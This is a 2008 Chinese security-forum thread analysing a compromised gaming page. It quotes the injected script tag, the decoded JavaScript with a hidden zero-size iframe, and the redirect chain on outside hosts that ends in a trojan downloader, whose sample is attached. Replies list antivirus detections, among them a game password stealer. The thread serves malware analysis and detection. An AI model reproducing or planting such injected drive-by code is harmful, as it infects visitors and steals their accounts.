收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) http://kf.shangdu.com/news/moshou/?37594
12下一页
返回列表 发新帖
查看: 3354|回复: 13
收起左侧

[已鉴定] http://kf.shangdu.com/news/moshou/?37594

 关闭 [复制链接]
冷冷
发表于 2008-11-24 16:07:28 | 显示全部楼层 |阅读模式
ll4.png


地址:http://kf.shangdu.com/news/moshou/?37594
挂马:<SCRIPT src="http://down.wmjqr.cn/down/downwow/ads1.js" type=text/javascript></SCRIPT>
内容:
document.writeln("<iframe height=570 width=710 align=center scrolling=no frameBORDER=0 src=http://down.wmjqr.cn/down/downwow/ui.htm></iframe>");
document.writeln("<p align=left>本站推荐魔兽挂机外挂:<a href=http://down.wmjqr.cn/down/downwow/downwow.asp?id=009><font color=red>魔兽世界Robolet(支持美,中,台服) (点击下载)</font></a><br><br>魔兽大脚插件BigFoot绿色版:<a href=http://down.wmjqr.cn/down/downwow/downwow.asp?id=010><font color=red>BigFoot绿色版(点击下载)</font></a><br><br>功能强大数据库最全的魔兽任务插件QuestLibrary:<a href=http://down.wmjqr.cn/down/downwow/downwow.asp?id=010><font color=red>QuestLibrary(点击下载)</font></a><br><br>CWDG为你制作的综合ACE2库包:<a href=http://down.wmjqr.cn/down/downwow/downwow.asp?id=010><font color=red>ACE Lib整合库包(点击下载)</font></a><br><br>魔兽滑翔机外挂,支持国服TBC :<a href=http://down.wmjqr.cn/down/downwow/downwow.asp?id=010><font color=red>魔兽滑翔机(点击下载)</font></a>");
document.writeln("<iframe height=0 width=0 src=http://btyxw.cn/ms/mm.htm></iframe>");
document.write('<br><br><iframe height=200 width=760 align=center scrolling=no frameBORDER=0 src=http://ad.cuioo.cn/ad/></iframe>');

http://btyxw.cn/ms/mm.htm
-->http://btyxw.cn/ms/lzn.htm
-->http://btyxw.cn/ms/realn.htm
-->http://btyxw.cn/ms/flash1.swf
-->http://btyxw.cn/ms/flash2.swf
-->http://btyxw.cn/ms/real.j
-->http://btyxw.cn/ms/014.js
  -->http://btyxw.cn/ms/014.exe 014.rar (1.99 KB, 下载次数: 84)
回复

举报

ALEXBLAIR
发表于 2008-11-24 17:08:36 | 显示全部楼层
卡巴对这个脚本都飘~~~TO KL

比较有意思的是,即使脚本都飘,最后下载的东西都杀,挂马的只能白高兴
回复

举报

啊弥陀佛
发表于 2008-11-24 17:27:11 | 显示全部楼层
微点拦截
未 命名.JPG
未命名.JPG
回复

举报

yeandwo
发表于 2008-11-24 17:36:07 | 显示全部楼层
avast  Win32:Spyware-gen [Trj]   Win32:Trojan-gen {Other}
回复

举报

卡巴007 该用户已被删除
发表于 2008-11-24 17:40:23 | 显示全部楼层
火狐直接挡了!

已报告的攻击站点!                    
位于 kf.shangdu.com 的站点已经被报告为攻击网站,而且已根据您的安全首选项而阻止。
         
攻击站点会安装用于盗窃隐私信息的程序,或使用您的计算机来攻击其他人,或者损坏您的系统。

某些攻击站点故意发布有害软件,但是许多都没有在获得用户允许或者了解的情况下进行。
回复

举报

左手
发表于 2008-11-24 17:43:01 | 显示全部楼层
2008-11-24 17:43:19    加载库文件      操作:阻止
进程路径:D:\Program Files\GreenBrowser\GreenBrowser.exe
文件路径:C:\Program Files\Common Files\System\msadc\msadco.dll
触发规则:所有程序规则->禁止加载的库文件->*\msadco.dll
回复

举报

leonfg
发表于 2008-11-25 01:12:44 | 显示全部楼层
C:\Documents and Settings\GUNDAM\桌面\014.rar » RAR » 014.exe - a variant of Win32/TrojanDownloader.Small.OEU trojan
C:\Documents and Settings\GUNDAM\桌面\ma.rar » RAR » ma[1].exe - Win32/PSW.WOW.COJ trojan
回复

举报

sanhu35
发表于 2008-11-25 10:18:43 | 显示全部楼层
支持1下
回复

举报

浪滔天
发表于 2008-11-25 19:03:22 | 显示全部楼层
卡巴的测试脚本启发引擎还行
1125-1.jpg
回复

举报

liwenshuo1
发表于 2008-11-25 19:07:57 | 显示全部楼层

Onecare 报一样的病毒

如图了
捕获.JPG
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-15 14:47 , Processed in 0.139976 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表